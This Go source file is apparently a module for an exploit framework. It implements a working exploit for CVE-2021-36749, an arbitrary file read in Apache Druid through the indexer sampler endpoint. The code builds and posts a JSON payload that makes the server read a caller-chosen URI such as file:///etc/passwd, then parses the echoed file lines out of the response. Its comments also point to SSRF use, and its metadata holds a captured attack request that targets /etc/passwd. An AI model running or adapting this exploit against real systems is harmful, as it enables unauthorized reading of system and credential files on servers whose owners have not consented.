package exp_Druid

import (
	"encoding/json"
	"regexp"
	"strings"

	"github.com/lz520520/railgunlib/pkg/register/exp_register"
	"github.com/lz520520/railgunlib/pkg/templates/exp_model"
	"github.com/lz520520/railgunlib/pkg/templates/exp_templates"
)

// Exp_CVE_2021_36749 is the exploit module for CVE-2021-36749, an arbitrary
// file read through Apache Druid's indexer sampler endpoint. It embeds
// ExpTemplate for the HTTP, header and messaging helpers that GetMsg1 uses
// (GetInitExpHeaders, HttpPostWithoutRedirect, AppendUri, EchoInfoMsg).
type Exp_CVE_2021_36749 struct {
	exp_templates.ExpTemplate
}

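// inputLineRe matches one sampled row in the sampler response body: the
// "input" object echoes the raw line read from the supplied URI, JSON-encoded
// under the column name "a" (the column declared in the payload's parseSpec).
// The capture accepts escaped characters, so a line containing `"` or `\` is
// captured whole instead of being cut at the first escaped quote.
var inputLineRe = regexp.MustCompile(`"input":{"a":"((?:[^"\\]|\\.)*)"`)

// GetMsg1 exploits CVE-2021-36749: the Druid sampler endpoint accepts an
// ioConfig whose firehose URI is caller-controlled, so a file:// URI makes the
// server read a local file and echo its lines back as sample rows.
//
// cmd is the URI to sample, e.g. file:///etc/passwd. The firehose is of type
// "http", so other URL schemes the server can fetch are presumably reachable
// as well — treat this as an SSRF primitive too, not only a file read.
//
// On success expResult.Result holds the fetched lines joined with "\r\n".
// The payload asks for numRows 500, so large files come back truncated.
// A transport error is returned in expResult.Err; a response with no
// recognisable rows is reported via EchoInfoMsg and leaves Result empty.
func (self *Exp_CVE_2021_36749) GetMsg1(cmd string) (expResult exp_model.ExpResult) {
	headers := self.GetInitExpHeaders()
	headers.Set("Content-Type", "application/json")

	// "l1ang" is the placeholder for the caller's URI. cmd is JSON-encoded
	// before substitution so a quote or backslash in it cannot break the
	// request body (json.Marshal of a string cannot fail; its \u00XX escapes
	// for <, > and & still decode to the same characters server-side).
	payload := `{"type": "index", "spec": {"type": "index", "ioConfig": {"type": "index", "firehose": {"type": "http", "uris": ["l1ang"]}}, "dataSchema": {"dataSource": "sample", "parser": {"type": "string", "parseSpec": {"format": "regex", "pattern": "(.*)", "columns": ["a"], "dimensionsSpec": {}, "timestampSpec": {"column": "!!!_no_such_column_!!!", "missingValue": "2010-01-01T00:00:00Z"}}}}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}`
	quoted, _ := json.Marshal(cmd)
	payload = strings.Replace(payload, `"l1ang"`, string(quoted), 1)

	httpresp := self.HttpPostWithoutRedirect(self.AppendUri(self.Params.Target, "/druid/indexer/v1/sampler?for=connect"), payload, headers)
	if httpresp.Err != nil {
		expResult.Err = httpresp.Err
		return
	}

	lines := extractSampledLines(httpresp.Body)
	if len(lines) == 0 {
		self.EchoInfoMsg("漏洞利用失败或文件不存在！！")
		return
	}
	expResult.Result = strings.Join(lines, "\r\n")
	return
}

// extractSampledLines pulls every echoed input line out of a sampler response
// body and JSON-decodes it, so escape sequences such as \" \\ and \n come back
// as the original characters rather than being returned verbatim. A row whose
// value does not decode as a JSON string is skipped instead of aborting the
// whole read. Returns nil-length slice when no rows are found.
func extractSampledLines(body string) []string {
	matches := inputLineRe.FindAllStringSubmatch(body, -1)
	lines := make([]string, 0, len(matches))
	for _, m := range matches {
		var line string
		if err := json.Unmarshal([]byte(`"`+m[1]+`"`), &line); err != nil {
			continue
		}
		lines = append(lines, line)
	}
	return lines
}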

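// init registers this module with the exploit registry at package load,
// together with the descriptive metadata shown to operators.
//
// The Payload text is a captured example request, not what GetMsg1 sends:
// it uses the newer inputSource/inputFormat spec form and is cut off before
// the end of the JSON body, whereas GetMsg1 builds the legacy firehose/parser
// form. Spaces lost from the request line and header lines of the capture
// have been restored so the example reads as valid HTTP.
func init() {
	expmsg := exp_model.ExpMsg{
		Author:   "凉风",
		Time:     `2022-05-19`,
		Range:    `Apache Druid <= v0.21.1`,
		ID:       `CVE-2021-36749`,
		Describe: `Apache Druid 任意文件读取漏洞`,
		Details:  `格式：file:///etc/passwd 更改文件即可`,
		Payload: `
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: www.cisp-pte.com
Content-Length: 423
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":
`,
		VulType:   `任意文件读取`,
		Reference: `http://wiki.cisp-pte.com/#/wiki`,
	}

	// Registration happens here (package init) so the module is discoverable
	// by the framework without any explicit wiring by callers.
	registerMsg := exp_register.ExpRegisterMsg{
		Msg: expmsg,
	}
	exp_register.ExpStructRegister(&Exp_CVE_2021_36749{}, registerMsg)
}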
